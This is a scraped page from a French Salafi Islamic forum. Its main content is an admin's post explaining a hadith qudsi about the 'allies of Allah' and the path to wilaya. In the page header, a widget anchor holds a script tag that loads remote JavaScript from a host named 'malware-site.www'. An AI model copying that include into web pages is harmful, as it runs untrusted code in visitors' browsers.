ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Octobre 2017

LunMarMerJeuVenSamDim
      1
2345678
9101112131415
16171819202122
23242526272829
3031     

Calendrier Calendrier


    les biens aimés d'ALLAH

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    les biens aimés d'ALLAH

    Message par assalafia le Mar 12 Juin - 13:16

    Le hadith transcendant qudsî rapporté par Al-Bukhârî, selon Abû Hurayrah(ra) Le Messager de Allah(saaws) , rapporte qu’Allah (awj) dit: "Celui qui fait montre d’hostilité envers un de Mes alliés (walî), Je lui déclare la guerre. Mon serviteur ne se rapproche guère de Moi par quelque chose qui M’est plus agréable que l’accomplissement de ce que Je lui ai prescrit. Mon Serviteur ne cesse de se rapprocher de Moi par des œuvres surérogatoires jusqu’à ce que Je l’aime. Et lorsque Je l’aime, Je deviens son ouïe par laquelle il entend, son regard par lequel il voit, sa main par laquelle il saisit, et son pied avec lequel il marche. S’il M’invoque, Je l’exaucerai certainement. S’il cherche refuge auprès de Moi, assurément, Je le lui accorderai. Aucune chose ne Me fait hésiter plus que [de prendre] l'âme de Mon fidèle serviteur : il déteste la mort et Je déteste le blesser."

    Les obligations doivent être un minimum vital. Ce que le Prophète a relaté de Allah dans ce Hadîth qudsî rappelle que c'est une fois ce minimum obligatoire accompli parfaitement que le facultatif prend un sens; et conduit vers un rapprochement intime avec Allah.

    Ibn rajab a dit à propos de ce hadith: "Ces paroles signifient que celui qui s'efforce de se rapprocher de Allah , en acquittant d'abord ses obligations, puis en se livrant à des pratiques surérogatoires, Allah le rapproche et l'élève du degrés de la foi vers celui de l'excellence (ihsan). C'est alors qu'il L'adore comme s'il Le voyait, et son coeur s'emplit de la connaissance de Allah, de Son amour, de Sa grandeur, et de Sa crainte révérencielle...

    L’Islam a réparti les alliés de Allah (awliyâ) en catégories, selon leur proximité spirituelle de Allah. Il y a donc des Prophètes, des véridiques, des martyrs et des vertueux. Il y a les devanciers et les gens de la droite. Il y a les rapprochés et les gens de bien. Il y a parmi les gens ceux qui font du tort à eux-mêmes, ceux qui se tiennent sur une voie moyenne, et ceux qui, par la permission de Allah, devancent les autres par leurs oeuvres pie. Les écarts entre leurs degrés de piété.

    Comment atteindre le degré de Wilawa ?

    Accomplir les Obligations, s’éloigner des interdits, se rapprocher d’Allah en faisant ce qu’il aime (Prière, lecture de coran, invocations, …) «Prosterne toi et rapproche-toi»

    La voie est la purification de l’être.

    Qui est l’allié d’Allah ? Quiconque peut être un bien aimé d’Allah.

    Le Wali est celui qui connaît bien Allah, ne néglige aucune obligation, ne s’approche d’aucun interdit ni les plaisirs même autorisés, il multiplie les bonnes œuvres, il suit le prophète r dans sa manière d’adorer Allah, sa manière de se comporter avec sa famille et les autres.

    La wilaya est cette même finalité que recherche le musulman et pour laquelle il déploie tous ses efforts. C’est son espoir de nuit comme de jour. C’est elle, et rien d’autre, qui le prive de sommeil le soir : il fuie son lits pour invoquer son Seigneur, par crainte et par espoir; la crainte de la privation et l’espoir de se rapprocher d’Allah.

    Les faveurs qu’Allah donne à son allié ?

    La voie de la piété, dans son élévation et sa noblesse, ne connaît presque pas de fin. Plus l’homme s’élève en piété, plus les faveurs divines envers lui augmentent. Ses faveurs atteignent des degrés qui dépassent même l’imagination de l’homme. Ces degrés sont explicités et exprimés dans ce hadith: "Devenir son ouïe, sa vue, sa main et son pied" cela ne signifie ni une union de nature avec Allah ni une fusion en Lui : ni que l'homme ayant atteint une grande proximité par rapport à Allah devienne divin, ni que Allah s'incarne en cet homme. C’est une volonté commune : le cœur de cet homme se met alors à être attiré essentiellement par ce que Allah agrée. L'homme ayant acquis la grande proximité dont parle ce Hadîth dispose donc d'un cœur proche de Allah, et, en tant que tel, ne ressent plus d'attirance qu'essentiellement pour écouter les paroles qu’Allah agrée, regarder les choses qu’Allah agrée, toucher ce qu’Allah agrée et aller là où Allah agrée.

    Décrivant Ses bien aimés dans le Coran, Allah dit: "Assurément les biens -aimés de Allah, aucune crainte à leur sujet et nul chagrin ne les affliges. Ceux qui ont cru et pratiquaient la piété y a pour eux une bonne annonce dans la vie d'ici-bas tout comme dans la vie ultime".

    Allah peut donner certaines faveurs à ceux qu’Il aime. Ils peuvent par l’aide d’Allah réaliser des choses qu’un homme normal ne peut réalisé, ils ont souvent une issue favorable de chaque difficulté, Allah les avertis souvent par des rêves pieux.


    Les alliés d’Allah et les alliés du diable.

    «Et lorsque Nous dîmes aux Anges : “Prosternez-vous devant Adam”, ils se prosternèrent, excepté Iblis [Satan] qui était du nombre des djinns et qui se révolta contre le commandement de son Seigneur. Allez-vous cependant le prendre, ainsi que sa descendance, pour alliés en dehors de Moi, alors qu'ils vous sont ennemis ? Quel mauvais échange pour les injustes !»

    Le pouvoir extraordinaire de certains n’en fait automatiquement des alliés d’Allah. Celui qui ne respecte pas les principes de l’islam ne peut pas être un Wali.

      La date/heure actuelle est Sam 21 Oct - 2:08